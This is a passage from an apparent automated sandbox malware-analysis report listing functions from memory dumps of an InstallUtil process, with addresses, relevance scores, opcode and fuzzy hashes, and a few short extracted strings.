                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0d93290dffabee4870fe86d0b832ead5738929516619e7cefd6b85a48d40f137
                                                                                      • Instruction ID: c304aae65eff526421bbad8bf4ba1501b628c2902253ce9023e29570f8fa77ba
                                                                                      • Opcode Fuzzy Hash: 0d93290dffabee4870fe86d0b832ead5738929516619e7cefd6b85a48d40f137
                                                                                      • Instruction Fuzzy Hash: 27A1B370E012188FEB68DF6AD944B9DFBF2AF89300F15C0AAD409B7255DB345A85CF50
                                                                                      Function 06149A18 Relevance: .2, Instructions: 218COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f0c3ece228bf053ac55ec7f67359dddfcc0fc8331380b7a928be6d9fc42cc6f7
                                                                                      • Instruction ID: 57d87b88e1c47fea4b18c489932b50501378b5bb3e189a75fe251a0dd1060f01
                                                                                      • Opcode Fuzzy Hash: f0c3ece228bf053ac55ec7f67359dddfcc0fc8331380b7a928be6d9fc42cc6f7
                                                                                      • Instruction Fuzzy Hash: 87A19371E012188FEB68DF6AD944B9EBBF2AF89300F14C4AAD40DB7255DB345A85CF50
                                                                                      Function 061493D0 Relevance: .2, Instructions: 218COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 096d715f6c405ad7e8fcf7b8724237bf64e9c52b6d6dd6118a89a9dbc0ac6510
                                                                                      • Instruction ID: 444dc2606484f38ce62356801833511b095d169833bab06eebe5beba639d5b9c
                                                                                      • Opcode Fuzzy Hash: 096d715f6c405ad7e8fcf7b8724237bf64e9c52b6d6dd6118a89a9dbc0ac6510
                                                                                      • Instruction Fuzzy Hash: ADA1A370E012188FEB68DF6AC944B9EBBF2AF89300F14C4AAD409A7255DB345A85CF50
                                                                                      Function 0614B9A0 Relevance: .2, Instructions: 218COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d7b86928e65986effa5b7a3efe3b9dace8f8d6a31b5d5d02dbdefd234b930600
                                                                                      • Instruction ID: 924fd623926743e928d2acf84626050746b55070c9993ced89a725cd10a6169b
                                                                                      • Opcode Fuzzy Hash: d7b86928e65986effa5b7a3efe3b9dace8f8d6a31b5d5d02dbdefd234b930600
                                                                                      • Instruction Fuzzy Hash: EDA1A375E052188FEB68DF6AC944B9DFBF2AF89300F14C0AAD409B7255DB349A85CF50
                                                                                      Function 061493C0 Relevance: .2, Instructions: 164COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d1578f1d55be71f068473cdfd302a3aef0f076b8ebd83328b415d94900204e9
                                                                                      • Instruction ID: 667af453b97a3ab755983a3deced347615f092b638d2b7fd5bcf411b6e571425
                                                                                      • Opcode Fuzzy Hash: 6d1578f1d55be71f068473cdfd302a3aef0f076b8ebd83328b415d94900204e9
                                                                                      • Instruction Fuzzy Hash: E871A370E00618CFEB68DF6AD944B9AFBF2AF89300F14C5AAD40DA7254DB345A85CF10
                                                                                      Function 06149A07 Relevance: .2, Instructions: 162COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0f967e7be5dac72e237d9ff65626bff92ceb3b23a4b786724ac8ecc66b912371
                                                                                      • Instruction ID: a2c7b2cbc08fd46cd6e219916793082180c5500a8b06ab2abf3082675152246d
                                                                                      • Opcode Fuzzy Hash: 0f967e7be5dac72e237d9ff65626bff92ceb3b23a4b786724ac8ecc66b912371
                                                                                      • Instruction Fuzzy Hash: F2718471E006188FEB68DF6AD944B9EFBF2AF89300F14C5AAD40DA7255DB345A85CF10
                                                                                      Function 0614B99A Relevance: .2, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 97aa95c11177b2207884ea7bb3e861bf5e53e93ebe4b6115d6706a515b44441e
                                                                                      • Instruction ID: 50369ca5e71fbf29cc11e56cbf13deca3300ef44cfe080395a5ba9e1a1b633cd
                                                                                      • Opcode Fuzzy Hash: 97aa95c11177b2207884ea7bb3e861bf5e53e93ebe4b6115d6706a515b44441e
                                                                                      • Instruction Fuzzy Hash: DD7184B1E00618CFEB68DF6AC954B9DFAF2AF89300F14C1AAD40DA7254DB345A85CF50
                                                                                      Function 061474A0 Relevance: .1, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b8ed4cdfa580e577e6a70c4a549fa6b92eef803ce41f10f412aeff9c1857f6b6
                                                                                      • Instruction ID: a8e106797be8075f31375be259156e22b06777f7dadd6551938bf89cdee0d016
                                                                                      • Opcode Fuzzy Hash: b8ed4cdfa580e577e6a70c4a549fa6b92eef803ce41f10f412aeff9c1857f6b6
                                                                                      • Instruction Fuzzy Hash: 2441F2B1D002088BEB18DFAAC9447DEBBF2BF89304F24C169C418BB2A4DB354946CF50
                                                                                      Function 0614B340 Relevance: .1, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b3c3a0aa474a3d76aa2fe92bf6e322093d8af037fc6ef6ba3fc23281da3a900f
                                                                                      • Instruction ID: 7ede377cf96d3cf86ed2d8834f938eec2022dd932c02e4f8f93b402bc73ad602
                                                                                      • Opcode Fuzzy Hash: b3c3a0aa474a3d76aa2fe92bf6e322093d8af037fc6ef6ba3fc23281da3a900f
                                                                                      • Instruction Fuzzy Hash: 714168B1E056188BEB58CF6BDD447D9FAF3AFC8310F14C1AAD50CA6264DB744A858F50
                                                                                      Function 0614ACF0 Relevance: .1, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 69ddd8e14d3104fefd2bc6c1e74c19f80b67ae843cd6468c34d0d20a79ae6fba
                                                                                      • Instruction ID: 27044be257822db2666c05b6dccad8395310697acc0cff67b62e89db5c828387
                                                                                      • Opcode Fuzzy Hash: 69ddd8e14d3104fefd2bc6c1e74c19f80b67ae843cd6468c34d0d20a79ae6fba
                                                                                      • Instruction Fuzzy Hash: D24159B1D016188BEB58CF6BCD4478AFAF3AFC9304F14C1AAD50CA7265DB744A858F50
                                                                                      Function 0614A6A2 Relevance: .1, Instructions: 109COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac71f2105963565a654f652faa6c24c3a5e85924731288ecde15c7089f6c9c57
                                                                                      • Instruction ID: 84d2d8453da109df3ea5f67e80f69699931b066ba25477aa1ca255dac2b3c56d
                                                                                      • Opcode Fuzzy Hash: ac71f2105963565a654f652faa6c24c3a5e85924731288ecde15c7089f6c9c57
                                                                                      • Instruction Fuzzy Hash: D24169B1E016188BEB58CF6BCD447CAFAF3AFC8300F14C1AAD50CA6264DB740A858F50
                                                                                      Function 06148D76 Relevance: .1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4f85d165b24dd667e76d92f73d9a2d7f4101f66c078e53f9f9321801403c19a0
                                                                                      • Instruction ID: 0507a31a74412c78e65d7011b6cb04dc6c4bd141774bca2e5981c4b49933fe77
                                                                                      • Opcode Fuzzy Hash: 4f85d165b24dd667e76d92f73d9a2d7f4101f66c078e53f9f9321801403c19a0
                                                                                      • Instruction Fuzzy Hash: F84147B1E016188BEB58CF6BD9457CAFAF3AFC9300F14C1AAD50CA6264DB744A858F51
                                                                                      Function 0614A056 Relevance: .1, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 100b2b220b7e7cf679125b018affa96d82fcbfe2784e01363a41c286508a2b45
                                                                                      • Instruction ID: c3b5b080214ca6dad5e2ea6a625430c05f626d925bfbda1e4811189db501edbc
                                                                                      • Opcode Fuzzy Hash: 100b2b220b7e7cf679125b018affa96d82fcbfe2784e01363a41c286508a2b45
                                                                                      • Instruction Fuzzy Hash: 9C4137B1E016188BEB58DF6BC9557CAFAF3AFC8300F14C1AAD50CA6264DB741A85CF51
                                                                                      Function 00B821E2 Relevance: 8.1, Strings: 6, Instructions: 585COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Xwq$Xwq$Xwq$Xwq$Xwq$Xwq
                                                                                      • API String ID: 0-2833233147
                                                                                      • Opcode ID: 2892d79a63f8888faf9ec06196f71133fb2dd01ce6b183d2079c59e097cc38b6
                                                                                      • Instruction ID: 53600f314286abce1da72857c0d44b7e2c3c3e86b9f859bbbf0fb9005f345291
                                                                                      • Opcode Fuzzy Hash: 2892d79a63f8888faf9ec06196f71133fb2dd01ce6b183d2079c59e097cc38b6
                                                                                      • Instruction Fuzzy Hash: 9C222BDAE0AA810BCB524F3816A82647FE0DF66118BE543CED5449B367F555DC0BC743
                                                                                      Function 00B87808 Relevance: 3.2, Strings: 2, Instructions: 705COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $sq$$sq
                                                                                      • API String ID: 0-1184984226
                                                                                      • Opcode ID: 6802ec027a9dc74a8ea99279a6a0ddcce3d7d29281810df6e5da752bcde5deed
                                                                                      • Instruction ID: e93fbb1a1e80598236d426f4c9644239372a7a2dd1ea3dc9ebdc40a4fc500ad5
                                                                                      • Opcode Fuzzy Hash: 6802ec027a9dc74a8ea99279a6a0ddcce3d7d29281810df6e5da752bcde5deed
                                                                                      • Instruction Fuzzy Hash: 11520F75A00258CFEB259BE4C850B9EBBB2FF85300F1081A9D10A6B3A5DF359E85DF51
                                                                                      Function 0614D9B9 Relevance: 3.1, Strings: 2, Instructions: 605COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tesq$Tesq
                                                                                      • API String ID: 0-1365298620
                                                                                      • Opcode ID: 48c2c2cde4333d37d18f1a61ebb00d3fa29a0c5ca6874a19f8f986419b08dbb0
                                                                                      • Instruction ID: f96684c6922c257849ccda7c63d6b953743f10729899ae19dffeb901b64dfdea
                                                                                      • Opcode Fuzzy Hash: 48c2c2cde4333d37d18f1a61ebb00d3fa29a0c5ca6874a19f8f986419b08dbb0
                                                                                      • Instruction Fuzzy Hash: FD52B174A01228CFDB65EF64C994BADBBB2FB89304F1081E9D909A7394CB355E81DF50
                                                                                      Function 0614D9B7 Relevance: 3.1, Strings: 2, Instructions: 602COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tesq$Tesq
                                                                                      • API String ID: 0-1365298620
                                                                                      • Opcode ID: 49728fd18fa7cf55a674b1a1210201dffd8ee8288e3a7ed537246828308635f5
                                                                                      • Instruction ID: 13e2e086c14bf0ad08cc4b8618b2f73116332850d357ca6d047cbc557643769e
                                                                                      • Opcode Fuzzy Hash: 49728fd18fa7cf55a674b1a1210201dffd8ee8288e3a7ed537246828308635f5
                                                                                      • Instruction Fuzzy Hash: 7052B174A01228CFDB65EF64C994BADBBB2FB89304F1081E9D909A7394CB355E81DF50
                                                                                      Function 0614DD6B Relevance: 2.9, Strings: 2, Instructions: 424COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tesq$Tesq
                                                                                      • API String ID: 0-1365298620
                                                                                      • Opcode ID: 583e46ee3afc9bf7cf392983281294e3766e3a281d4caf1a342d5b11a7e23cc5
                                                                                      • Instruction ID: e72fd1a1b8746d1292cdca240c883a89f74afeb1e44b4f6786446cb6820efb26
                                                                                      • Opcode Fuzzy Hash: 583e46ee3afc9bf7cf392983281294e3766e3a281d4caf1a342d5b11a7e23cc5
                                                                                      • Instruction Fuzzy Hash: 8122B074A01228DFDB65EF74C994BADBBB2FB89300F1081A9D949A7364CB355E81DF40
                                                                                      Function 00B856B0 Relevance: 2.8, Strings: 2, Instructions: 324COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Hwq$Hwq
                                                                                      • API String ID: 0-741242263
                                                                                      • Opcode ID: 9e31be0c5d9bd20a4ae7f6cfefdf69135e7819359b3b3d8ff449083ca92b8024
                                                                                      • Instruction ID: 38ed1feb21580429d963f82009c80e50ab7ad726909cb0a9e20624a89f7a10a2
                                                                                      • Opcode Fuzzy Hash: 9e31be0c5d9bd20a4ae7f6cfefdf69135e7819359b3b3d8ff449083ca92b8024
                                                                                      • Instruction Fuzzy Hash: EAB1BD353046548FDB25AF78C898B6A7BE2EB89310F1485A9E446CB3A1DF34CC41CBA1
                                                                                      Function 06141F80 Relevance: 2.7, Strings: 2, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LRsq$LRsq
                                                                                      • API String ID: 0-2113534932
                                                                                      • Opcode ID: f36d16964516b5c2ba93086da5d752ca185d1a855517fa1d74bc35b8e7e125e2
                                                                                      • Instruction ID: 1a9dd7e4d1e8332c4741fd63cbe76f6c2d1f9f79e744a9e475702f3703e4e1e6
                                                                                      • Opcode Fuzzy Hash: f36d16964516b5c2ba93086da5d752ca185d1a855517fa1d74bc35b8e7e125e2
                                                                                      • Instruction Fuzzy Hash: 3481C175B001058FCB58EF78C95896E7BF2AF89600B1584AAE506DB3B5DF31ED42CB90
                                                                                      Function 061483B8 Relevance: 2.7, Strings: 2, Instructions: 214COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (&sq$(wq
                                                                                      • API String ID: 0-153982265
                                                                                      • Opcode ID: 4dc9a4736e755b35e0ec204ba89a00dac2185e7e84ce1532d73c6db5560714cb
                                                                                      • Instruction ID: 4b387f1ad41b0b938761b6bc2767feabbfb32f4f193f9c0a8501f00fd2d6ebf2
                                                                                      • Opcode Fuzzy Hash: 4dc9a4736e755b35e0ec204ba89a00dac2185e7e84ce1532d73c6db5560714cb
                                                                                      • Instruction Fuzzy Hash: 72718331F002599BDF59EFA8D8506AEBBF6AFC4700F144569E406AB380DF349D06C7A1
                                                                                      Function 0614F030 Relevance: 2.6, Strings: 2, Instructions: 150COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'sq$4'sq
                                                                                      • API String ID: 0-780347173
                                                                                      • Opcode ID: fb77c0d4c31c95a839afdf31a647e849e4a42f5f645344414cb8b49862816bef
                                                                                      • Instruction ID: c682edccfbc8384a2d30166b04ef5a914eef2f535ce56fa2a75d3c25971d98e7
                                                                                      • Opcode Fuzzy Hash: fb77c0d4c31c95a839afdf31a647e849e4a42f5f645344414cb8b49862816bef
                                                                                      • Instruction Fuzzy Hash: 14518070A00209DFCF04EFA8D591A9EBBF1FF89300F108569D005AB255DB359D45CB61
                                                                                      Function 00B83428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Xwq$Xwq
                                                                                      • API String ID: 0-2617233878
                                                                                      • Opcode ID: 4d6c24a026c831e95a767f5d93a6821103583de7ab9ceb0b6ecfaea641dfeaa7
                                                                                      • Instruction ID: 660066af3385e6e52e47d5b1c17079b0f9a291f7aa1cb97f0535dbcc005f73ed
                                                                                      • Opcode Fuzzy Hash: 4d6c24a026c831e95a767f5d93a6821103583de7ab9ceb0b6ecfaea641dfeaa7
                                                                                      • Instruction Fuzzy Hash: D131E471B042148BDF2DAAAA999427EA6E6FBC4F10F184479D806C33A0DF74CE45D761
                                                                                      Function 00B83400 Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Xwq$Xwq
                                                                                      • API String ID: 0-2617233878
                                                                                      • Opcode ID: 281b5bdb03b670fd9bc6d278bd30fbae4cda695f0c6789c46b36cd2df29513a8
                                                                                      • Instruction ID: 9a00989383085f66931900a07f7d1586e1e2b6819593f65a00223bd5c7e03e50
                                                                                      • Opcode Fuzzy Hash: 281b5bdb03b670fd9bc6d278bd30fbae4cda695f0c6789c46b36cd2df29513a8
                                                                                      • Instruction Fuzzy Hash: 7521FC71B092444BDB16656948A417A9FE6EFD2F10F1C40FAC54587362EE618D02D361
                                                                                      Function 0614E6F1 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tesq
                                                                                      • API String ID: 0-136783293
                                                                                      • Opcode ID: f0ef2139897b3fc553bbdcf6e193ec8179f4997a1974b05ec64ce6b634a5dc67
                                                                                      • Instruction ID: 6b9e39a3cf61630b2de39864138faf373a8407fc97b3dd50fe15a64ce12a0df7
                                                                                      • Opcode Fuzzy Hash: f0ef2139897b3fc553bbdcf6e193ec8179f4997a1974b05ec64ce6b634a5dc67
                                                                                      • Instruction Fuzzy Hash: 03619474E00258CFDB54DFB9C990A9DBBB2FF89300F20816AD959AB365DB315986CF40
                                                                                      Function 0614E700 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tesq
                                                                                      • API String ID: 0-136783293
                                                                                      • Opcode ID: c138b6bd40273e89c4d4e481d1ca604e161638b41ccb653a8edfdaa9d56c3ed6
                                                                                      • Instruction ID: 7207087b4250566a030dea8d93ea4739d8b0eeec52c8d5f31dac42bd2a958bb9
                                                                                      • Opcode Fuzzy Hash: c138b6bd40273e89c4d4e481d1ca604e161638b41ccb653a8edfdaa9d56c3ed6
                                                                                      • Instruction Fuzzy Hash: 67618374E00218CFDB54DFA9C990A9DBBB2FF89300F20816AD919AB365DB315D86CF40
                                                                                      Function 00B8A660 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (osq
                                                                                      • API String ID: 0-609861455
                                                                                      • Opcode ID: 333114ec6a98945690251192d1b92ee2d3501d7605bf415ab636813cd91c781b
                                                                                      • Instruction ID: 70402993ae2a8ff5b5ffcb405faacaeaa7593b6510f30589d0c9cc0e4c23edf2
                                                                                      • Opcode Fuzzy Hash: 333114ec6a98945690251192d1b92ee2d3501d7605bf415ab636813cd91c781b
                                                                                      • Instruction Fuzzy Hash: 3141E3367042449FCB05AB68DD54AAE7BF7AFC9311F24446AE506E73A0DE319C02C7A1
                                                                                      Function 00B8A828 Relevance: .4, Instructions: 410COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f24513551be2e91347b5444763c90d1108afb49a52ee2529e51add9efcfde2b8
                                                                                      • Instruction ID: 398912fd028ff87c14b191b40808ecfd71b3236279bae7a2a0257a217e02edbe
                                                                                      • Opcode Fuzzy Hash: f24513551be2e91347b5444763c90d1108afb49a52ee2529e51add9efcfde2b8
                                                                                      • Instruction Fuzzy Hash: 08F10B75A005158FDB04DFA8C984AADBBF2FF88310B2A819AE515AB371DB35EC41CF51
                                                                                      Function 0614E1A7 Relevance: .2, Instructions: 208COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3292702277.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_6140000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0fb4e17db8b8d7e1f41a94fb31514e73f26587f73c4703540c84ee8e0063f357
                                                                                      • Instruction ID: 0420db4993d36e3be9ade7a022905711aabce61e359e83f6b3efb08468c1adb5
                                                                                      • Opcode Fuzzy Hash: 0fb4e17db8b8d7e1f41a94fb31514e73f26587f73c4703540c84ee8e0063f357
                                                                                      • Instruction Fuzzy Hash: 30A1C278A10218CFDB25ABB0C994BADBBB2FB88300F108099DA4967365CF355E91DF41
                                                                                      Function 00B87450 Relevance: .2, Instructions: 201COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.3286982931.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_b80000_InstallUtil.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8e832cea75727a4c78f3e4373c34e8c12aa55265cf91ca56f2e329c4a3fba00f
